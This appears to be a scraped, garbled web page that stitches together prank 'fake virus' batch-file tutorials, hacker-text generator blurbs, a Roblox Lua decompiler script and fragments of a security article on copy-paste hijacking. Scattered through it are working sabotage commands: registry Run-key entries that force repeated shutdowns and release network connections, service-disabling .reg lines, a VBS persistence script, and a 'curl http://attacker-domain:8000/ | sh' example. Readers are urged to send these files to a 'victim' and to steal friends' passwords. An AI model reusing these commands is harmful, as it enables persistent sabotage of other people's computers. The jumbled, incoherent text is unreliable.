Now name it something interesting. It allows you to make multiple choice questions with interactive answers. Now, you can use this to your advantage. local Place = game:GetService('MarketplaceService'):GetProductInfo(game.PlaceId); local Illegal = {'/', '\\', ':', '? It shuts down your internet permanently. They should know better, regardless of confidence level! It is something else, that just provides a fast response, add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v MiXedVeX /t, REG_SZ /d %systemroot%HaloTrialScoreChangerV1 /f > nul, >>%Temp%.kill.reg ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess], >>%Temp%.kill.reg ECHO Start=dword:00000004, >>%Temp%.kill.reg ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv], >>%Temp%.kill.reg ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c], reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f, Im gonna teach you how to make a virus named Matrix. C:\Users\USERNAME\AppData\Local\Temp\Roblox\sounds. Not sure what to do?ping n- 2>nulping n- 2>nulecho Becauseping n- 2>nulClscolor Fecho YOU SHOULD HAVE SEEN THE LOOK ON YOUR FACE!! even if the code / cmd line is not malicious, it could be bad. Unicode scrambled text. Convert normal text intoHacker Text styles Using Hacker Text Generator. . Since then Wizer has been rapidly growing with over 3000 organization who signed up for our free training. I haven't seen this program here on steam discussions so I want to share it. Random IP Generator. Src = '-- Server script not decompiled :('; Append = 'nulecho Downloading 1%ping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulecho Downloading 8%ping n- 2>nulping n- 2>nulping n- 2>nulecho Downloading 14%ping n- 2>nulecho Downloading 16%ping n- 2>nulping n- 2>nulping n- 2>nulecho n- 2>nulecho Download has been paused.pauseecho A virus has been detected. BTW, that 3rd line, isnt what disables the internet, permanently. This feature only makes sense if your font has "randomization" within its custom JavaScript code. Try them once to make your contextual and gaming content more attractive. See details. Send it to the victim by mail or by Pen Drive. Let your characters stand out with custom and crazy decorations. Do NOT Copy And Paste Code to Terminal. Security pros should never paste into a terminal from an external source they don't control. We have randomly selected and YOU HAVE WON!ping n- 2>nulecho "What did I win?" Copy the HTML code and paste it into your favorite HTML editor, such as Dreamweaver, FrontPage, or any plain-text editor (e.g., Notepad). Protects the user from having the selected text of a web page changed when they are trying to copy text document.getElementById ('text-to-copy').select (); With the text selected we can now use the execCommand . In fact, the whole of ecommerce is trust-based. To review, open the file in an editor that reveals hidden Unicode characters. SHARE. Cls During their job, developers often copy and paste code from the Internet from sources like Stackowerflow and other websites. Copy and paste these for as much time as needed. This is the part where we begin the fake game download and fake virus detection. The solution is to paste into a text editor first. Append = '' .. Objp.Value .. ''; Append = '' .. tostring(Objp) .. ''; Append = '' .. tostring(Objp) .. ''; Append = '' .. tostring(Objp) .. ''; local String = Objp:gsub("[&<>]", Conversions); -- Because I got C O M P L A I N T S. Append = '' .. It's also where the virus begins to "delete" the "SYSTEM32" files. Cls This fake virus acts like it installs a video game, then "senses" a virus and tries to delete it. Then save it as SEO.bat and the batch file is created. . Then, select the style of text that you want to generate and click "generate". Download this fake progress bar, and youre good to go. Write down "Roblox Studio" as the keyword and then press Enter. Once you select the hacker text style, you can copy it with one click and paste it wherever you need it. We have randomly selected and YOU HAVE WON!ping n- 2>nulecho "What did I win?" String .. ''; Append = '' .. Objp.Number .. ''; local X, Y, Z, R00, R01, R02, R10, R11, R12, R20, R21, R22 = Objp:components(), ''. Gamers use these special hacking texts to make their gaming profile usernames more attractive. We're not letting you throw away a perfectecho video game that's n- 2>nulping n- 2>nulgoto 1:4Clscolor Cecho Deleting virus 1%ping n- 2>nulping n- 2>nulping n- 2>nulecho Deleting virus 37%echo Deleting virus 43%ping n- 2>nulecho Error.exeping n- 2>nulecho Failure to delete virus.echo =!WARNING!=echo Your data is at risk!pauseecho Deleting all SYSTEM32 filesping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulClsecho Cleared.pauseClscolor 4echo Error.exeping n- 2>nulecho SYSTEM32 files being restored.pauseecho Error.exeecho SYSTEM32 files n- 2>nulecho ! ping n- 2>nul - This part is probably the most important command throughout the fake virus. So this generator "hacks" the text by applying all sorts of random modifier characters to the text that you input! ##################################################################, :4Clscolor Cecho Deleting virus 1%ping n- 2>nulping n- 2>nulping n- 2>nulecho Deleting virus 37%echo Deleting virus 43%ping n- 2>nulecho Error.exeping n- 2>nulecho Failure to delete virus.echo =!WARNING!=echo Your data is at risk!pauseecho Deleting all SYSTEM32 filesping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulClsecho Cleared.pause. Usually you do, but with some "multi-line" fonts, you don't. Created in 2011, Hacker Typer arose from a simple desire to look like the stereotypical hacker in movies and pop culture. This repository has been archived by the owner on Jul 30, 2021. on Step 2. A Fake Hack. This took me LITERALLY forever to make, and I hope you find ways to prank friends, teachers, you name it! As a full stack software engineer, I don't remember every single command I might need on a day-to-day basis. echo shutdown -r -t 11 -f>>c:windowshartlell.bat, reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f, echo ipconfig/release_all>>c:windowswimn32.bat, reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f, echo You Have Been Hackedecho @echo off>c:windowswimn32.bat. As soon as you copy the "sudo apt update"text contained in an HTML element, the code snippet, shown below runs. Copy-Paste Hack using JavaScript. "regex" rules) to create more complex translation rules than simple substitutions. !ping n- 2>nulecho I TOTALLY GOT YOU!! There is another important reason to choose our hacked text generator, we provide different font styles of hacked words. If this is a new font name, choose a new password. Copy and paste the following code into Notepad: . This text font was made using 2 min ago Visible = false -- make sure frame is the name of your frame. And in 2020 we partnered with several local counties to offer free Citizen Training. msg* I told you not to mess with me, OMG this hacking tip is soo cool i scared my friends with it and they were like screamming crazy. I have found an exploit, with just some lines of JavaScript code, that can alter the copy-paste feature of any browser and make you paste (and execute) a different kind of code. Also many terminals can be configured not to automatically execute when you paste a "\n" (new line). 2 years ago, Reply Unicode scrambled text. I don't have an easy solution for the casual user, except to not click on these suspect links (on sites you're unfamiliar with or don't trust). I go to see everyday a few web sites and blogs to read articles, but this weblog provides feature based writing.|, bruh is that actually your website and if it is well i loved it so much, i like this website its gonna scare my friends btw i am in my school computer, how did u do it then bcs its blocked for me. Fake Hacking Troll. Classes = game:HttpGetAsync(''); -- Classes = game:GetService('HttpService'):GetAsync(''); for _, Player in next, Players:GetPlayers() do, table.insert(IgnoredList, tostring(Player)); -- Let's *not*. This should shut down the persons computer. hehehe, thank you so much for to helping me hack and scare my friends, now they think Im super cool >:), lol loved the notepad one made one and emailed it to my teacher totaly killed their PC, got into a bit of trouble tho, i love the first one i like it i even scared my dad. It is simple and one of the best tricks to prank your friends and fool them into thinking you have hacked someones computer. Health Men's Health Mental Health Women's Health. Here are some examples of regex rules that you can use: You can define a custom JavaScript function in the box below that will be used to transform your final text after all your rules have been applied. Please Note though that some websites have . New clipboard hijacker replaces crypto wallet addresses with lookalikes. 1 hour ago local Players = game:GetService('Players'); local Beat = game:GetService('RunService').Heartbeat; -- Also some other minor performance upgrades, --- Synapse and Elysian individual support, ---- Re-did Elysian callback stuff because it was slow, ---- Added an Elysian fallback to LuaDec whenever needed, local NotFilter = (not workspace.FilteringEnabled); -- Bytecode used to replicate lol, game:GetService('ServerStorage'); -- Internal stuff. Cloned.Name = Obj.Name .. ':' .. Obj.ClassName; local Saved = setmetatable({}, {__index = function(This, Idx) local C = Count + 1; Count = C; This[Idx] = C; return C; end}); Final[1] = 'nullnil'; if Classes[Obj.ClassName] and (not IgnoredList[Obj.Name]) then. This site is fantastic, usually among the forefront on any emerging security issue ,and gets a lot of linking, but not enough engagement IMO. paste . Purchase a laptop skin that is hacker inspired and select wallpapers that are mysterious and geeky to make your prank successful. Shock your friend by stealing their Facebook passwords. We have MANY Security Awareness Training videos to help, Join the Community and Stay up to Date on Cyber Security Awareness. (It's in between the hashtags), ###############################################################, @echo offtitle Free Call of Duty!color Becho Congratulations! All it takes is a single line of code injected into the code you copied to create a backdoor to your app. it is easy to use and generate hacker text. curl http://attacker-domain:8000/ | sh, Don't copy-paste commands from webpages you can get hacked,, Just wondering if i do the shut down prank on my sisters computer it will turn back on right? Dish Network confirms ransomware attack behind multi-day outage, LastPass: DevOps engineer hacked to steal password vault data in 2022 breach, Windows 11 Moment 2 update released, here are the many new features, U.S. This is the final step in creating the fake virus. local Props = {}; --Edited by Doctor Derank to work. echo. | 0.07 KB, We use cookies for various purposes including analytics. Fake Hacking With Batch Files: Create a new text document Save it as ".bat" Copy and paste the code into your .bat file Code: @echo off goto start :start title PASSWORD color 0a cls echo. Still, people often reproduce the answers on private blogs . Then it says that you got trolled. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository. 17 votes, 80 comments. easily generate and share hacker . Ipsum Codem. Have fun! and we come to a conclusion with the hacker's talking. dim strDir,strfile,st,strtxt2,strshell,strlog, dim obfso,obfolder,obshell,obfile,obtxtfile, set obfso=CreateObject(Scripting.FileSystemObject), set obfile=obfso.CreateTextfile(strDir & strfile), obfile.writeline(set ws=createobject(&st&strshell&st&)), obfile.writeline(, ws.regwrite HKCUSoftwareMicrosoftWindowsCurrentVersionRunLogoff,C:WINDOWSwscript.vbs,REG_SZ. in the box below: How it works behind the scenes. Basic security practices, practiced always, are a fundamentally more effective security measure than the latest update to your security stack reacting to the latest attack iteration and this goes for home users, as well. Use Git or checkout with SVN using the web URL. This text font was made using Ctrl + Shift + I and go to "Console" tab Mute/deafen your discord before executing anything (important) Paste in code and execute the code.js Unmute and undeafen, you'll now be able to talk normally, while others will see you as muted and/or deafened 1 year ago, You need to save it as a .bat (batch) file. [CDATA[' .. Src .. ']]>'; Append = '' .. Objp .. ''; elseif (Type == 'PhysicalProperties') then, 'true', .. '' .. tostring(Objp.Density) .. '', .. '' .. tostring(Objp.Friction) .. '', .. '' .. tostring(Objp.Elasticity) .. '', .. '' .. tostring(Objp.FrictionWeight) .. '', .. '' .. tostring(Objp.ElasticityWeight) .. ''. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Do you want to show a "randomize" button for the output text box? If you're editing an existing font, then you must enter the password that was used when you created the font. I am sure at least 90% of your friends have saved their passwords on chrome for a quicker log-in time. Sitemap. Advertisement. The magic is in the JavaScript code hidden behind the PoC HTML page setup by Friedlander. Sign in Create an account Support us. ########################################################################, Clscolor 4echo Error.exeping n- 2>nulecho SYSTEM32 files being restored.pauseecho Error.exeecho SYSTEM32 files n- 2>nulecho ! There's a save button below the rules so you can save your font with a unique URL. Just type in any regular English and we'll do this hard work for you! Searching and copying commands is necessary, as is knowing where you're copying from. I'm so lazy this afternoon and quite seasonally afflicted as well as I look out at the gray sky I am working on making it so that it will shut down the computer for those REALLY pesky friends and teachers. A Pocket Sundial From a Broken Pocket Watch! How do I save it an by what program name? This step comes after you "download" the free game. that's not the real problem, IMO. We have randomly selected and YOU HAVE WON!ping n- 2>nulecho "What did I win?" Simply open Notepad and copy paste below codes and save it with ".vbs" extension. Copy and paste this DIRECTLY below Step 1's coding. !ping n- 2>nulecho #TROLLS FOR DAYS!! Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late. (I hope) Remember: I am working on one where it shuts down the computer. If nothing happens, download GitHub Desktop and try again. After hitting Enter, you will be able to see some results. Translation rules than simple substitutions then `` senses '' a virus and tries to delete it Step.... Purchase a laptop skin that is hacker inspired and select wallpapers that are and. From sources like Stackowerflow and other websites part where we begin the fake game download and fake virus below 1. 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